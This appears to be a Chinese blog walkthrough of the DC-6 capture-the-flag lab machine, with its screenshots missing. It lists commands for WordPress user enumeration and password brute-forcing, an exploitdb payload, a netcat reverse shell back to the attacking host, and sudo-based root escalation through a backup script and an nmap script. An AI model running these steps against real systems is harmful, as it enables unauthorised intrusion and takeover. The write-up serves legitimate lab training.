DC-6靶機實戰練習

環境:VMware 15虛擬機軟件

DC-6靶機IP地址:192.168.146.136

Kali的IP地址:192.168.146.130

第一步 主機掃描

[nmap -sP 192.168.0/24]
在這裏插入圖片描述

第二步 掃描開放的端口

[nmap -sV 192.168.146.136]
在這裏插入圖片描述

第三步 訪問80端口—此時需要重定向設置

  • linux下設置
    在這裏插入圖片描述

  • window下設置
    在這裏插入圖片描述在這裏插入圖片描述

第四步 掃描後臺目錄 以及賬號密碼

[wpscan --url http://wordy/ -e u]
adminsarahgrahammarkjens-
在這裏插入圖片描述在這裏插入圖片描述在這裏插入圖片描述

第五步 獲取登錄賬號和密碼

在這裏插入圖片描述
[wpscan --url http://wordy/ -U aa.txt -P passwd]markhelpdesk01
方法一:使用kali裏面的 wpscan爆破
在這裏插入圖片描述在這裏插入圖片描述
方法二:使用burpSuit抓包爆破-
在這裏插入圖片描述在這裏插入圖片描述

第六步 登錄mark賬號-

在這裏插入圖片描述在這裏插入圖片描述

第七步 漏洞利用

我們直接複製html進行修改[cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html]
[vim 45274.html]
在這裏插入圖片描述在這裏插入圖片描述

第八步 kali開啓臨時http服務 訪問45274.html頁面

[python -m SimpleHTTPServer 80]
在這裏插入圖片描述在這裏插入圖片描述
[nc -lvvp 9999]
方法二 burpsuit抓包 進行反彈shell
[nc 192.168.146.130 9999 -e /bin/bash]
在這裏插入圖片描述

第九步 切換shell進入交互模式,並進入mark的家目錄下查找文件

python -c ‘import pty;pty.spawn("/bin/bash")’
[cd /home/mark/stuff]
[cat things-to-do.txt]
獲得 賬號/密碼 user: graham - GSo7isUM1D4
在這裏插入圖片描述

第十步 切換 graham

[ssh [email protected]]
[sudo -l]
[cd /home/jens/ ]
[cat backups.sh]
是對web的文件進行打包備份的
在這裏插入圖片描述

第十一步 寫入腳本,切換到jens賬號

[echo “/bin/bash” >> backups.sh ]
[cat backups.sh ]
[sudo -u jens ./backups.sh]
在這裏插入圖片描述

第十二步 nmap提權

[echo ‘os.execute("/bin/sh")’ > getshell]
[sudo nmap --script=getshell]
[cd /root]
[cat theflag.txt]
在這裏插入圖片描述

免責聲明本文檔供學習,請使用者注意使用環境並遵守國家相關法律法規!由於使用不當造成的後果上傳者概不負責!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章